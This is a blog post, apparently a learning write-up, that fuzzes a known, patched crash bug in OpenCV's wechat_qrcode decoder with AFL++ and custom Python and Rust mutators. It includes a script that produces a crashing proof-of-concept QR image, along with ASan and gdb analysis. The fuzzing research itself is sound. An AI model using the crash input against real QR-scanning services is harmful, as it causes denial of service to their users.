wechat qrcode bug fuzzing

TL;DR 针对近期爆出来的 opencv_contrib/modules/wechat_qrcode 二维码解析bug,写了 custom mutator (实现了Python版本和Rust版本),利用AFL++顺利fuzzing到了这个bug。

最近重拾fuzzing,学点挖洞技巧,准备找工作了,学术圈我是混不明白了。这个文章就作为学习记录。


new a aflplusplus container

cd /src

git clone [https://github.com/opencv/opencv_contrib.git](https://github.com/opencv/opencv_contrib.git) -b 960b3f685f39c0602b8a0dd35973a82ee72b7e3c

git clone [https://github.com/opencv/opencv.git](https://github.com/opencv/opencv.git) -b 85ea247cc6fd840ee477d03fc9aa31c8c7f6d9ef

mkdir build && cd build

cmake -DCMAKE_C_COMPILER=afl-clang-fast -DCMAKE_CXX_COMPILER=afl-clang-fast++ -DBUILD_SHARED_LIBS=OFF -DOPENCV_EXTRA_MODULES_PATH=/src/opencv_contrib/modules /src/opencv

修改 opencv_contrib/modules/wechat_qrcode/test/test_main.cpp:

#include <iostream>
#include <vector>
#include <string>
#include "test_precomp.hpp"
#include "opencv2/objdetect.hpp"
#include "opencv2/wechat_qrcode.hpp"

using namespace std;
using namespace cv;

int main(int argc, char **argv) {
    if (argc < 2) return 1;
    string image_path(argv[1]);
    Mat src = imread(image_path, IMREAD_GRAYSCALE);
    if (!src.empty()) {
        wechat_qrcode::WeChatQRCode detector;
        vector<string> outs = detector.detectAndDecode(src);
        // print outs
        for (size_t i = 0; i < outs.size(); i++) {
            cout << outs[i] << endl;
        }
    }
    return 0;
}

AFL_USE_ASAN=1 make -j32 -C modules/wechat_qrcode

target: bin/opencv_test_wechat_qrcode


编译完可以找个poc试一下,确保没编译出问题:

fix(wechat_qrcode): Init nBytes after the count value is determined by Konano · Pull Request #3480 · opencv/opencv_contrib (github.com)

生成poc的代码参考:

import qrcode
from qrcode.util import *
from qrcode import QRCode

def hack_put(self, num, length):
        if num == 0:
            num = 1 # make a fake length, too big will not crash 
        for i in range(length):
            self.put_bit(((num >> (length - i - 1)) & 1) == 1)

qrcode.util.BitBuffer.put = hack_put # random_put

qr = QRCode(1, qrcode.constants.ERROR_CORRECT_L, mask_pattern=0)

data = "POC".encode("utf-8")
data += b' ' * (19-len(data)-3) # 19为1-L的Total Number of Data Codewords for this Version and EC Level,-3是由于模式和长度指示器共占了24位,正好为3Byte。
user_data=QRData(data, MODE_8BIT_BYTE)
hack_data=QRData(b'', MODE_8BIT_BYTE)

qr.add_data(user_data)
qr.add_data(hack_data)

img = qr.make_image()
img.save('hack.png')


bug分析我就不写了,看上面的pr就能看明白,关于qrcode的更多信息可以参考这篇复现:WECHAT二维码闪退分析 - FreeBuf网络安全行业门户


现就可以找一些二维码图片开始疯狂fuzzing,但是就算很小的二维码图片也有300多字节,如果按照bit变异,很大概率是没法发通过opencv对二维码图片的解析的,变到猴年也很难顺利触法这个bug。

于是自然就想到,要基于正确的二维码图片格式做一些变异。这个方法 evilpan 已经做过尝试,但是他做的变异范围比较广,所有的qrcode的可选字段他都random生成,然后基于生成的正常qrcode做一些bit翻转。他的测试是发了一个月也没看到crash。其实正常的fuzzing就应该是这样,但是我这里就拿着锤子找钉子,做针对性的变异。


AFL++ persistent mode

persistent mode 速度比默认AFL++快很多,官方文档说速度x10 or x20,可以参考:AFLplusplus/instrumentation/README.persistent_mode.md at stable · AFLplusplus/AFLplusplus · GitHub

实际 fuzzing 测试 persist mode 确实比默认编译的 opencv_test_wechat_qrcode 测试快10多倍。


修改 opencv_contrib/modules/wechat_qrcode/test/test_main.cpp:

#include <iostream>
#include <vector>
#include <string>
#include "test_precomp.hpp"
#include "opencv2/objdetect.hpp"
#include "opencv2/wechat_qrcode.hpp"

using namespace std;
using namespace cv;

int fuzz_buf(unsigned char *buf, size_t size) {
  Mat src = imdecode(Mat(1, size, CV_8UC1, buf), IMREAD_GRAYSCALE);
  if (!src.empty()) {
    auto detector = wechat_qrcode::WeChatQRCode();
    std::vector<std::string> outs = detector.detectAndDecode(src);
    return outs.size();
  }
  return -1;
}

__AFL_FUZZ_INIT();

int main() {
  // anything else here, e.g. command line arguments, initialization, etc.
#ifdef __AFL_HAVE_MANUAL_CONTROL
  __AFL_INIT();
#endif

  unsigned char *buf = __AFL_FUZZ_TESTCASE_BUF;  // must be after __AFL_INIT
                                                 // and before __AFL_LOOP!
  while (__AFL_LOOP(10000)) {
    int len = __AFL_FUZZ_TESTCASE_LEN;  // don't use the macro directly in a
                                        // call!
    if (len < 8) continue;  // check for a required/useful minimum input length
    /* Setup function call, e.g. struct target *tmp = libtarget_init() */
    /* Call function to be fuzzed, e.g.: */
    fuzz_buf(buf, len);
    /* Reset state. e.g. libtarget_free(tmp) */
  }
  return 0;
}

编译目标路径相同:

target: bin/opencv_test_wechat_qrcode

mv bin/opencv_test_wechat_qrcode bin/opencv_test_wechat_qrcode_persist


fuzzing cmd:

afl-fuzz -i corpus/ -o output -t +2000 -- ./opencv_test_wechat_qrcode_persist

corpus 下面放几个能正常解析的qrcode图片

Untitled


发了将近一天,什么有用的都没发到,解析导致crash的28个文件,全部都是被opencv的代码顺利捕获的cv::Exception 图像解析异常,导致的Aborted也没啥用。并没有执行到目标子模块中的关键decode函数

terminate called after throwing an instance of 'cv::Exception'
  what():  OpenCV(4.8.0-pre) /src/opencv/modules/imgcodecs/src/loadsave.cpp:77: error: (-215:Assertion failed) static_cast<size_t>(size.height) <= CV_IO_MAX_IMAGE_HEIGHT in function 'validateInputImageSize'

Aborted (core dumped)
34304
terminate called after throwing an instance of 'cv::Exception'
  what():  OpenCV(4.8.0-pre) /src/opencv/modules/imgcodecs/src/loadsave.cpp:79: error: (-215:Assertion failed) pixels <= CV_IO_MAX_IMAGE_PIXELS in function 'validateInputImageSize'

Aborted (core dumped)
34304
terminate called after throwing an instance of 'cv::Exception'
  what():  OpenCV(4.8.0-pre) /src/opencv/modules/imgcodecs/src/loadsave.cpp:75: error: (-215:Assertion failed) static_cast<size_t>(size.width) <= CV_IO_MAX_IMAGE_WIDTH in function 'validateInputImageSize'

这和 evilpan 测试的fuzzing结果是一样的


custom mutator

接下来就是拿着锤子找钉子环节,鉴于我们已经知道了bug的原因:opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp 中 DecodedBitStreamParser::decodeByteSegment 函数里 nBytes,count 赋值有bug,导致读取qrcode里一段data时可能出现数据计数count≠0,而data=“”的情况,最后导致非法内存访问。具体解析可以看上面提到的pr。

简单起见,我们可以定制一个mutator,生成一个小的qrcode,然后疯狂的random变异他一段数据的长度和count这两个字段:


import qrcode
from qrcode.util import *
import random
from qrcode import util, QRCode
from bisect import bisect_left
from io import BytesIO

def hack_data_len(data):
    # return len(data) # original
    return random.randint(0,18) # make a fake length, too big will not crash

def hack_create_data(version, error_correction, data_list):

    buffer = BitBuffer()
    for data in data_list:
        buffer.put(data.mode, 4)
        data_len = hack_data_len(data)
        buffer.put(data_len, length_in_bits(data.mode, version))
        data.write(buffer)

    # Calculate the maximum number of bits for the given version.
    rs_blocks = base.rs_blocks(version, error_correction)
    bit_limit = sum(block.data_count * 8 for block in rs_blocks)
    if len(buffer) > bit_limit:
        raise exceptions.DataOverflowError(
            "Code length overflow. Data size (%s) > size available (%s)"
            % (len(buffer), bit_limit)
        )

    # Terminate the bits (add up to four 0s).
    for _ in range(min(bit_limit - len(buffer), 4)):
        buffer.put_bit(False)

    # Delimit the string into 8-bit words, padding with 0s if necessary.
    delimit = len(buffer) % 8
    if delimit:
        for _ in range(8 - delimit):
            buffer.put_bit(False)

    # Add special alternating padding bitstrings until buffer is full.
    bytes_to_fill = (bit_limit - len(buffer)) // 8
    for i in range(bytes_to_fill):
        if i % 2 == 0:
            buffer.put(PAD0, 8)
        else:
            buffer.put(PAD1, 8)

    return create_bytes(buffer, rs_blocks)

qrcode.util.create_data = hack_create_data

def init(seed):
    """
    Called once when AFLFuzz starts up. Used to seed our RNG.

    @type seed: int
    @param seed: A 32-bit random value
    """
    random.seed(233)

def fuzz(buf, add_buf, max_size):
    """
    Called per fuzzing iteration.

    @type buf: bytearray
    @param buf: The buffer that should be mutated.

    @type add_buf: bytearray
    @param add_buf: A second buffer that can be used as mutation source.

    @type max_size: int
    @param max_size: Maximum size of the mutated output. The mutation must not
        produce data larger than max_size.

    @rtype: bytearray
    @return: A new bytearray containing the mutated data
    """
    
    qr = QRCode(1, qrcode.constants.ERROR_CORRECT_L, mask_pattern=0) # 1-L mode data max ot 16
    data = b"deadbeef" * random.randint(0, 4)
    data2 = b"deadbeef" * random.randint(0, 4)
    qr.add_data(QRData(data, MODE_8BIT_BYTE))
    qr.add_data(QRData(data2, MODE_8BIT_BYTE))
    img = qr.make_image()
    img_bytes = BytesIO()
    img.save(img_bytes, "png")
    return bytearray(img_bytes.getvalue())

这里我们选择 1-L mode ,这个模式最长codeword是19,其中mode和count占据3字节,所以我们能操控的data长度是16,这里使用n个重复的b"deadbeef",最大24,保证能有溢出效果。

qrcode.make_image 总会调用qrcode.util.create_data,我们这里重写这个方法,唯一的变化就是在向bufferdata_list时,控制count字段,使用一个随机的长度 data_len = hack_data_len(data) ,这里hack_data_len控制在[0,17] 也是刚好能超过16溢出.


fuzzing cmd:

AFL_CUSTOM_MUTATOR_ONLY=1 PYTHONPATH=$PWD AFL_PYTHON_MODULE=qrcode_mutator afl-fuzz -i corpus/ -o output_w_mutator -t +9000 -- ./opencv_test_wechat_qrcode_persist


Untitled


半个小时就出现了一个crash,第一个crash就顺利命中了,


id-000000.png


Untitled


qrcode 解析 from QRazyBox - QR Code Analysis and Recovery Toolkit (merri.cx)

[AFL++ ca32c4c1ac87] /src/build/fuzzing # ./opencv_test_wechat_qrcode output_w_mutator/id-000000.png
AddressSanitizer:DEADLYSIGNAL
=================================================================
==204888==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000005 (pc 0x7f3e12b0fa60 bp 0x7ffc402fcff0 sp 0x7ffc402fc7a8 T0)
==204888==The signal is caused by a READ memory access.
==204888==Hint: address points to the zero page.
    #0 0x7f3e12b0fa60  (/lib/x86_64-linux-gnu/libc.so.6+0xc4a60) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)
    #1 0x55a00ce4a497 in __interceptor_memcpy (/src/build/fuzzing/opencv_test_wechat_qrcode+0x3c6497) (BuildId: 96f5964f2bbc86cfa7923e5f345d712478fc66a8)
    #2 0x7f3e12de0892 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_M_append(char const*, unsigned long) (/lib/x86_64-linux-gnu/libstdc++.so.6+0x14d892) (BuildId: f57e02bfadacc0c923c82457d5e18e1830b5faea)
    #3 0x55a00d343a9e in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::append(char const*, unsigned long) /usr/lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/basic_string.h:1246:9
    #4 0x55a00d343a9e in zxing::qrcode::DecodedBitStreamParser::append(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, char const*, unsigned long, zxing::ErrorHandler&) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp:108:12
    #5 0x55a00d343a9e in zxing::qrcode::DecodedBitStreamParser::decodeByteSegment(zxing::Ref<zxing::BitSource>, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, int, zxing::common::CharacterSetECI*, zxing::ArrayRef<zxing::ArrayRef<char> >&, zxing::ErrorHandler&) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp:227:5
    #6 0x55a00d348d03 in zxing::qrcode::DecodedBitStreamParser::decode(zxing::ArrayRef<char>, zxing::qrcode::Version*, zxing::qrcode::ErrorCorrectionLevel const&, zxing::ErrorHandler&, int) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp:463:25
    #7 0x55a00d2509be in zxing::qrcode::Decoder::decode(zxing::Ref<zxing::BitMatrix>, bool, zxing::ErrorHandler&) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoder.cpp:158:20
    #8 0x55a00d24d50b in zxing::qrcode::Decoder::decode(zxing::Ref<zxing::BitMatrix>, zxing::ErrorHandler&) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoder.cpp:47:30
    #9 0x55a00d1d7259 in zxing::qrcode::QRCodeReader::decodeMore(zxing::Ref<zxing::BinaryBitmap>, zxing::Ref<zxing::BitMatrix>, zxing::DecodeHints, zxing::ErrorHandler&) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/qrcode_reader.cpp:120:30
    #10 0x55a00d1d3936 in zxing::qrcode::QRCodeReader::decode(zxing::Ref<zxing::BinaryBitmap>, zxing::DecodeHints) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/qrcode_reader.cpp:46:31
    #11 0x55a00d1fab94 in cv::wechat_qrcode::DecoderMgr::Decode(zxing::Ref<zxing::BinaryBitmap>, zxing::DecodeHints) /src/opencv_contrib/modules/wechat_qrcode/src/decodermgr.cpp:89:21
    #12 0x55a00d1fab94 in cv::wechat_qrcode::DecoderMgr::TryDecode(zxing::Ref<zxing::LuminanceSource>, std::vector<zxing::Ref<zxing::Result>, std::allocator<zxing::Ref<zxing::Result> > >&) /src/opencv_contrib/modules/wechat_qrcode/src/decodermgr.cpp:78:15
    #13 0x55a00d1f465f in cv::wechat_qrcode::DecoderMgr::decodeImage(cv::Mat, bool, std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >&, std::vector<std::vector<cv::Point_<float>, std::allocator<cv::Point_<float> > >, std::allocator<std::vector<cv::Point_<float>, std::allocator<cv::Point_<float> > > > >&) /src/opencv_contrib/modules/wechat_qrcode/src/decodermgr.cpp:46:19
    #14 0x55a00d1c87e8 in cv::wechat_qrcode::WeChatQRCode::Impl::decode[abi:cxx11](cv::Mat const&, std::vector<cv::Mat, std::allocator<cv::Mat> >&, std::vector<cv::Mat, std::allocator<cv::Mat> >&) /src/opencv_contrib/modules/wechat_qrcode/src/wechat_qrcode.cpp:148:34
    #15 0x55a00d1c674a in cv::wechat_qrcode::WeChatQRCode::detectAndDecode[abi:cxx11](cv::_InputArray const&, cv::_OutputArray const&) /src/opencv_contrib/modules/wechat_qrcode/src/wechat_qrcode.cpp:100:19
    #16 0x55a00cee699f in main /src/opencv_contrib/modules/wechat_qrcode/test/test_main.cpp:27:40
    #17 0x7f3e12a74d8f  (/lib/x86_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)
    #18 0x7f3e12a74e3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x29e3f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)
    #19 0x55a00ce31d04 in _start (/src/build/fuzzing/opencv_test_wechat_qrcode+0x3add04) (BuildId: 96f5964f2bbc86cfa7923e5f345d712478fc66a8)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xc4a60) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d) 
==204888==ABORTING

custom mutator(Rust)

python 太慢,搞个rust版本,afl++有官方example可以参考:

image = "0.22.0”

qrcode git v0.11.2

rand = "0.8.4”

#![cfg(unix)]
#![allow(unused_variables)]
use custom_mutator::{export_mutator, CustomMutator};
use image::Luma;
use qrcode::QrCode;
use qrcode::bits::Bits;
use qrcode::types::{EcLevel, Version};

use rand::Rng;

struct ExampleMutator {
    own_image_buffer: Vec<u8>,
}

impl CustomMutator for ExampleMutator {
    type Error = ();

    fn init(seed: u32) -> Result<Self, Self::Error> {
        // print a message to console
        println!("ExampleMutator init() called with seed {}", seed);
        Ok(Self {
            own_image_buffer: Vec::new(),
        })
    }

    fn fuzz<'b, 's: 'b>(
        &'s mut self,
        buffer: &'b mut [u8],
        add_buff: Option<&[u8]>,
        max_size: usize,
    ) -> Result<Option<&'b [u8]>, Self::Error> {
        
        let bytes_data: &[u8] = b"deadbeef";
        let bytes_data1 = bytes_data.repeat(rand::thread_rng().gen_range(0..=3));
        let bytes_data2 = bytes_data.repeat(rand::thread_rng().gen_range(0..=3));

        let mut bits: Bits = Bits::new(Version::Normal(1));
        bits.push_byte_data(bytes_data1.as_slice());
        bits.push_byte_data(bytes_data2.as_slice());
        bits.push_terminator(EcLevel::L);

        let qrcode = QrCode::with_bits(bits, EcLevel::L).unwrap();
        let image = qrcode.render::<Luma<u8>>().build();
        image.save("./temp-rust-qrcode.png").unwrap();
        let bytes_vec = std::fs::read("./temp-rust-qrcode.png").unwrap();
        self.own_image_buffer = bytes_vec;
        
        Ok(Some(self.own_image_buffer.as_slice()))
    }
}

export_mutator!(ExampleMutator);

这里需要魔改rust-qrcode这个库,关键是bits.rs文件中的一个函数:

use rand::Rng;

impl Bits {
    /// Encodes 8-bit byte data to the bits.
    pub fn push_byte_data(&mut self, data: &[u8]) -> QrResult<()> {
        // use global RNG generate a random number between 0 and 18
        let data_len = rand::thread_rng().gen_range(0..=17);

        self.push_header(Mode::Byte, data_len)?;
        for b in data {
            self.push_number(8, u16::from(*b));
        }
        Ok(())
    }
}

把 push_header 这里第二个参数用随机数替代,和python代码里一个意思。rust-qrcode 项目也需要添加rand crate依赖。


魔改完这个代码,生成的qrcode不能过 ec.rs 中 construct_codewords 函数的一个断言,我直接把这个断言注释了。


编译完得到的so文件路径指定传给下面这个环境变量

export AFL_CUSTOM_MUTATOR_LIBRARY=/src/build/fuzzing/rust_mutator/target/debug/examples/libexample_mutator.so

fuzzing cmd:

AFL_CUSTOM_MUTATOR_ONLY=1 afl-fuzz -i corpus/ -o output_w_rust -t +5000 -- ./opencv_test_wechat_qrcode_persist


速度快不少,从每秒6次到每秒180次:

Untitled


manual check

gdb, 根据上面的执行报错,断点敲一个在zxing::qrcode::DecodedBitStreamParser::decodeByteSegment上,敲一个在memcpy上,run。

下面是读取第一个数据块时的情况,根据amd64的调用约定void * __cdecl memcpy ( void * dst, const void * src, size_t count ),顺序为rdi,rsi,rdx,rdx存了长度16,地址rsi存的是字符串“deadbeefdeadbeef”

Untitled


继续执行,到下一个数据块读取,

Untitled


memcpy要执行长度为13的copy,然而 rsi指向0x0,所以必然非法访问。


summary

这个bug确实挺难fuzzing的,要针对decode过程针对性的设计mutator,才有可能快速找到,否则就只能一直在二维码图片解析上绕圈。

我这里是因为先知道了bug在哪,然后针对性设计mutator,才顺利找到的,所以非常weak,要对所有字段都fuzzing的话那就要更大程度的重写qrcode的生成代码,还要对qrcode有比较深入的了解。

另外,现在这个qrcode mutator只是随机变异,好像是不能利用到AFL++的power schedule,我感觉应该是没有顺利应用覆盖率导向。


作为一个学习的demo来说,就还行吧。


ref:

fix(wechat_qrcode): Init nBytes after the count value is determined by Konano · Pull Request #3480 · opencv/opencv_contrib (github.com)

针对二维码解析库的 Fuzzing 测试 (seebug.org)

Fuzzing in Depth | AFLplusplus

QRazyBox - QR Code Analysis and Recovery Toolkit (merri.cx)